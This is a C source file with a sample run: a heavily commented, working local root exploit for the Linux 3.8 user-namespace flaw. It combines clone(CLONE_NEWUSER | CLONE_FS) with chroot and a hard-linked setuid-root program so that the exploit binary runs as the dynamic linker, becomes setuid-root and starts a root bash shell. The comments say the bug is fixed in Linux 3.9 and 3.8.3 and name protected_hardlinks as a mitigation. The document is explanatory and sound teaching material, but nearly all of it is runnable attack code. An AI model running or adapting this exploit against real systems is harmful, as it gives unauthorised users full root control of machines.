/*The program below demonstrates a security vulnerability in the Linux 3.8 implementation of user namespaces. That vulnerability is already fixed in Linux 3.9 (and stable kernel 3.8.3). The following shell script shows an example run of this program:
 
    $ uname -sr
    Linux 3.8.0
    $ cc -static -Wall userns_exploit.c -o userns_exploit
    $ cp userns_exploit /tmp        # On same filesystem as /bin/fusermount
    $ cd /tmp
    $ ls -l --numeric-uid-gid --inode /bin/fusermount /tmp/userns_exploit |
        awk '{printf "%6d %s %5d %5d  %s\n", $1, $2, $4, $5, $NF}'
    172255 -rwsr-xr-x.     0     0  /bin/fusermount
      8169 -rwxr-xr-x.  1000  1000  /tmp/userns_exploit
    $ ./userns_exploit /bin/fusermount
    PID 18583: / inode is 2
    PID 18583: path of this executable is: '/tmp/userns_exploit'
    PID 18583: waiting for "/tmp/userns_exploit" to become setuid-root
            PID 18584: child continues after fork()
            PID 18584: setting up chroot directory tree
            PID 18584: link("/bin/fusermount", "chroot/suid-root")
            PID 18584: link("/tmp/userns_exploit", "chroot/lib64/ld-linux-x86-64.so.2")
            PID 18584: created chroot tree:
                    172255  755 s     0     0  chroot/suid-root
                      8169  755    1000  1000  chroot/lib64/ld-linux-x86-64.so.2
            PID 18584: clone() returned PID = 18594
            PID 18584: calling waitpid()
                    PID 18594: clone child started
                    PID 18594: / inode is 2
                    PID 18594: finished chroot()
                    PID 18594: / inode is 788413 (chrooted)
                    PID 18594: exiting
            PID 18584: waitpid() complete
            PID 18584: / inode is 788413 (chrooted)
            PID 18584: execve a set-user-ID root program: /suid-root
            PID 18584:         ... passes control to dynamic linker (PHASE 2)
            PID 18584: PHASE 2 =====> execed with geteuid() == 0 && argc == 1
            PID 18584: / inode is 788413 (chrooted)
            PID 18584: make /lib64/ld-linux-x86-64.so.2 setuid-root
            PID 18584: state of chroot tree:
                    172255  755 s     0     0  ./suid-root
                      8169  755 s     0     0  ./lib64/ld-linux-x86-64.so.2
            PID 18584: exiting
    PID 18583: "/tmp/userns_exploit" is now setuid-root
    PID 18583: / inode is 2
    PID 18583: execve(/tmp/userns_exploit) (starts PHASE 3)
    PID 18583: PHASE 3 =====> execed with geteuid() == 0 && argc == 2
    PID 18583: / inode is 2
    PID 18583: rUID: 1000   eUID: 0  
    PID 18583: calling setuid(0)
    PID 18583: rUID: 0      eUID: 0  
    PID 18583: / inode is 2
    PID 18583: execve: /bin/bash
    bash$ id -u
    0
 
At the end of the above output, we see that a bash shell has been fired up, and the effective ID of the shell is 0. An unprivileged user has gained full root privileges.
*/
/* userns_exploit.c
 
   (C) Copyright 2013, Michael Kerrisk
 
   Licensed under the GNU General Public License version 2 or later.
 
   This program is very much inspired by Sebastian Krahmer's
   clown-newuser.c. Sebastian did all the heavy intellectual lifting.
   This program conducts the same exploit, but does so in well commented
   and well instrumented form, to ease understanding of what goes on.
 
   Sebastian's original program can be found at
   http://stealth.openwall.net/xSports/clown-newuser.c
   and his blog post on the exploit can be found at
   http://c-skills.blogspot.de/2013/03/clonenewuser-trickery.html
 
   The basis of the exploit is that Linux 3.8 allows the combination
   clone(CLONE_NEWUSER | CLONE_FS), which creates a situation where two
   processes are in different user namespaces but share their root
   directory attribute. By executing an arbitrary set-user-ID-root program
   (i.e., not one over whose operation we have any control) and employing
   some chroot(2) trickery, we can engineer a situation where *this*
   program is executed as the dynamic linker for the set-user-ID-root
   program. This leads to full root escalation from an unprivileged login.
 
   Linux 3.9 will already close this loophole by denying
   clone(CLONE_NEWUSER | CLONE_FS). The loophole is also closed in stable
   kernel 3.8.3.
 
   This program must be statically linked against glibc:
 
        cc userns_root_exploit.c -static
*/
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <sched.h>
#include <stdarg.h>
#include <fcntl.h>
#include <string.h>
#include <limits.h>
#include <errno.h>
#include <ftw.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/stat.h>
 
#define errExit(msg)    do { perror(msg); exit(EXIT_FAILURE); \
                           } while (0)
 
extern char **environ;
 
#define STACK_SIZE (1024 * 1024)
static char child_stack[STACK_SIZE];
 
/* Log a message to stdout, indented using 'prefix' and with PID of caller */
 
static void
logmsg(char *prefix, const char *format, ...)
{
    va_list arg_list;
 
    printf("%sPID %ld: ", prefix, (long) getpid());
 
    va_start(arg_list, format);
    vprintf(format, arg_list);
    va_end(arg_list);
}
 
/* Display credentials of caller, along with inode of root directory */
 
static void
display_status(char *prefix)
{
    struct stat sb;
 
    if (stat("/", &sb) == -1)
        errExit("stat");
 
    logmsg(prefix, "/ inode is %ld", (long) sb.st_ino);
 
    /* The true root directory always has i-node 2. If / does not
       have inode 2, then we're inside a chroot jail; print a string
       indicate that. */
 
    if (sb.st_ino != 2)
        printf(" (chrooted)");
    printf("\n");
}
 
/* Called by nftw() for each node in a directory subtree. Display the
   following information about regular files: inode number,
   permissions (octal), set-user-ID flag, UID, GID, and pathname*/
 
static int
traverse_file(const char *pathname, const struct stat *sb, int type,
                      struct FTW *ftwb)
{
    if (S_ISREG(sb->st_mode))
        printf("\t\t%6ld  %3o %c %5d %5d  %s\n",
                (long) sb->st_ino, sb->st_mode & 0777,
                (sb->st_mode & S_ISUID) ? 's' : ' ',
                sb->st_uid, sb->st_gid, pathname);
 
    return 0;                   /* Tell nftw() to continue */
}
 
/* Traverse directory tree 'path' displaying information about regular
   files in the tree. */
 
static void
display_file_tree(char *path)
{
    nftw(path, traverse_file, 20, 0);
}
 
/* Start function for child of clone().
 
   Call chroot() to change the root directory. Because the child
   was created with CLONE_FS, the root directory of the parent
   process is also changed. However, the parent is still in the
   initial user namespace; therefore if it executes a
   set-user-ID-0 program, it will get an effective UID 0. */
 
static int
clone_child(void *arg)
{
 
    usleep(10000);      /* Just avoid confused intermingling of output */
    logmsg("\t\t", "clone child started\n");
    display_status("\t\t");
 
    /* Change the root directory. This affects the parent process,
       since it shares the root directory attribute. */
 
    if (chdir("chroot") == -1)
        errExit("chdir");
    if (chroot(".") == -1)
        errExit("chroot");
 
    logmsg("\t\t", "finished chroot()\n");
    display_status("\t\t");
 
    logmsg("\t\t", "exiting\n");
    return 0;
}
 
/* Create a chroot file tree.
 
   'self_path' is the pathname of this program (userns_chroot_exploit).
   'suid_path' is the path of an arbitrary set-user-ID-root program
   on the system to be exploited. */
 
static void
create_chroot_tree(const char *self_path, char *suid_path)
{
    logmsg("\t", "setting up chroot directory tree\n");
 
    /* Create directories */
 
    if (mkdir("chroot", 0755) == -1)
        errExit("mkdir 1");
    if (mkdir("chroot/lib64", 0755) == -1)
        errExit("mkdir 2");
 
    /* Link an arbitrary set-user-ID-root executable ('suid_path')
       to a location inside the tree.
 
       Note that this link() call will fail on systems where the
       /proc/sys/fs/protected_hardlinks file is set nonzero. That
       setting is designed to prevent exploits like this one. The
       default value in this file is 0 on vanilla kernels, but
       some distributions set it nonzero by default.
 
       The link() call will also fail if the two pathnames
       are on different file systems. Nothing new there,
       but it's an easy error to encounter when trying to link
       to set-user-ID-root programs in /usr/bin, for example. */
 
    logmsg("\t", "link(\"%s\", \"chroot/suid-root\")\n", suid_path);
    if (link(suid_path, "chroot/suid-root") == -1)
        perror("link suid_path");
 
    /* Within the chroot directory, link the userns_chroot_exploit
       executable to /lib64/ld-linux-x86-64.so.2, the path where the
       'suid-root' program will look for a dynamic linker.  (This
       pathname is architecture dependent; here we assume x86-64.) */
 
    logmsg("\t", "link(\"%s\", \"chroot/lib64/ld-linux-x86-64.so.2\")\n",
            self_path);
    if (link(self_path, "chroot/lib64/ld-linux-x86-64.so.2") == -1)
        errExit("link self_path");
 
#if 0
#endif
 
    /* For informational purposes, show the resulting chroot tree */
 
    logmsg("\t", "created chroot tree:\n");
    display_file_tree("chroot");
}
 
/* Prepare the exploit. Create and populate a directory tree to be used
   as a chroot jail. Then create a clone child that is in a different
   user namespace but shares the root directory attribute. That
   child will then do a chroot() into the jail; that chroot()
   call will also affect the caller of clone(). */
 
static void
prepare_the_exploit(char *self_path, char *suid_path)
{
    pid_t pid;
 
    create_chroot_tree(self_path, suid_path);
 
    /* Create a clone() child that resides in a new user namespace but
       shares the filesystem information (root directory, current working
       directory, umask) with the parent process.*/
 
    pid = clone(clone_child, child_stack + sizeof(child_stack),
                CLONE_NEWUSER | CLONE_FS | SIGCHLD, NULL);
    if (pid == -1)
        errExit("clone");
 
    logmsg("\t", "clone() returned PID = %ld\n", (long) pid);
 
    /* Wait for child to finish its work and terminate */
 
    logmsg("\t", "calling waitpid()\n");
    if (waitpid(pid, NULL, 0) == -1)
        errExit("waitpid");
    logmsg("\t", "waitpid() complete\n");
}
 
int
main(int argc, char *argv[])
{
 
    setbuf(stdout, NULL);       /* Make stdout unbuffered */
 
    /* In all, this program will be executed three times, once for each
       branch in the following if () {} else if () {} else {}.
       The if-logic distinguishes the three phases of the exploit. */
 
    if (geteuid() != 0) {
 
        /* PHASE 1: We are in the initial user namespace,
           and have no privileges.
 
           Do a fork() to create parent and child processes.
 
           The child prepares the exploit, and then executes a
           set-user-ID-root program that has been hard linked into
           a chroot jail. The environment of that program has been
           engineered so that instead of executing the true dynamic
           linker, it instead executes a program of our own choosing:
           well choose this program (userns_chroot_exploit) as the
           dynamic linker. Consequently, userns_chroot_exploit will
           run with true UID 0 (full privileges), and will carry out
           PHASE 2 of the exploit.
 
           Meanwhile the parent sits in a loop waiting until the
           userns_chroot_exploit executable file is made set-user-ID-root
           (a step performed by PHASE 2), and then re-executes the
           executable. */
 
        char self_path[PATH_MAX];
        pid_t pid;
 
        display_status("");
 
        /* Introspect via /proc/self/exe to obtain pathname of
           executable being run in this process */
 
        memset(self_path, 0, sizeof(self_path));
        readlink("/proc/self/exe", self_path, sizeof(self_path) - 1);
        logmsg("", "path of this executable is: '%s'\n", self_path);
 
        pid = fork();
        if (pid == -1)
            errExit("fork");
 
        if (pid == 0) {         /* Child */
 
            char *suid_argv[] = { "/suid-root", NULL };
 
            logmsg("\t", "child continues after fork()\n");
 
            prepare_the_exploit(self_path, argv[1]);
 
            /* At this point, we are inside the chroot jail (because the
               clone child did a chroot() and the two processes share the
               root directory attribute). Now execute a set-user-ID-root
               program. Since we are in the *initial* user namespace
               the program will gain the true UID 0. Even though we didn't
               have any special control of the set-user-ID-root program,
               we have put it in a chroot environment where we *do* control
               the dynamic linker that it will employ. That dynamic linker
               is another instance of the userns_chroot_exploit program,
               executed with different command-line arguments--it will be
               run as true UID 0. This is the critical step in gaining root
               privileges on the system. */
 
            display_status("\t");
 
            logmsg("\t", "execve a set-user-ID root program: %s\n",
                    suid_argv[0]);
            logmsg("\t", "\t... passes control to dynamic linker (PHASE 2)\n");
 
            execve(suid_argv[0], suid_argv, NULL);
            errExit("execve");
 
        } else {                /* Parent */
 
            /* The parent has a distinct root directory attribute from the
               child and the clone child, and so is unaffected by the
               chroot() call in the clone child. */
 
            char *self_argv[] = { self_path, "1", NULL };
            struct stat sb;
 
            /* Wait until the pathname of the executable being run by this
               program has been made set-user-ID-root, then execute it. */
 
            logmsg("", "waiting for \"%s\" to become setuid-root\n",
                    self_path);
 
            for (;;) {  /* Poll file state at intervals */
                if (stat(self_path, &sb) == -1)
                    errExit("stat");
                if (sb.st_uid == 0 && (sb.st_mode & S_ISUID))
                    break;
                usleep(10000);
            }
 
            logmsg("", "\"%s\" is now setuid-root\n", self_path);
            display_status("");
 
            /* Now reexecute userns_chroot_exploit; since that executable
               is now set-user-ID-root, we now gain full root privileges. */
 
            logmsg("", "execve(%s) (starts PHASE 3)\n", self_path);
 
            execve(self_path, self_argv, environ);
            errExit("execve");
        }
 
    } else if (geteuid() == 0 && argc == 1) {
 
        /* PHASE 2:
           We are inside the chroot jail, running with true UID 0.
 
           We can't break out of the jail, but since we are true UID 0,
           we can create a set-user-ID-root executable. We make the dynamic
           linker inside the jail set-user-ID-root and then terminate.
           During PHASE 1, the dynamic linker path was created as a link
           to the userns_chroot_exploit executable, so this step has the
           effect of making that executable (which is *outside* the chroot
           jail) set-user-ID-root. */
 
        logmsg("\t", "PHASE 2 =====> "
                "execed with geteuid() == 0 && argc == 1\n");
 
        display_status("\t");
        logmsg("\t", "make /lib64/ld-linux-x86-64.so.2 setuid-root\n");
 
        chown("lib64/ld-linux-x86-64.so.2", 0, 0);
        chmod("lib64/ld-linux-x86-64.so.2", 04755);
 
        /* For informational purposes, redisplay the file tree in
           the chroot jail, so that we can see the changes that have
           been wrought. */
 
        logmsg("\t", "state of chroot tree:\n");
        display_file_tree(".");
 
        logmsg("\t", "exiting\n");
        exit(EXIT_SUCCESS);
 
    } else {
 
        /* PHASE 3:
           We are outside the chroot jail, inside the initial user
           namespace, running with true UID 0. All the hard work has
           been done; all we need now is a shell running as root. */
 
        char *shell_argv[] = { "/bin/bash", NULL };
 
        /* Sanity check: the program logic dictates that our
           effective UID must be zero here, but double check. */
 
        if (geteuid() != 0) {
            fprintf(stderr, "Unexpected execution environment\n");
            exit(EXIT_SUCCESS);
        }
 
        logmsg("", "PHASE 3 =====> "
                "execed with geteuid() == 0 && argc == %d\n", argc);
 
        display_status("");
 
        /* At this stage, we have an effective user ID of 0, but our
           real user ID is still nonzero. Many shells (rightly) view
           that constellation with suspicion, and when they detect
           it on start-up, they reset the effective UID to be the
           same as the real UID. bash(1) is no exception. Therefore,
           we have to ensure that the real user ID is also made 0
           before executing bash. */
 
        logmsg("", "rUID: %-4ld   eUID: %-4ld\n",
                (long) getuid(), (long) geteuid());
 
        logmsg("", "calling setuid(0)\n");
 
        if (setuid(0) == -1)
            errExit("setuid");
 
        logmsg("", "rUID: %-4ld   eUID: %-4ld\n",
                (long) getuid(), (long) geteuid());
        display_status("");
 
        /* Now we can run a full shell as root */
 
        logmsg("", "execve: %s\n", shell_argv[0]);
 
        execve(shell_argv[0], shell_argv, environ);
        errExit("execve");
    }
}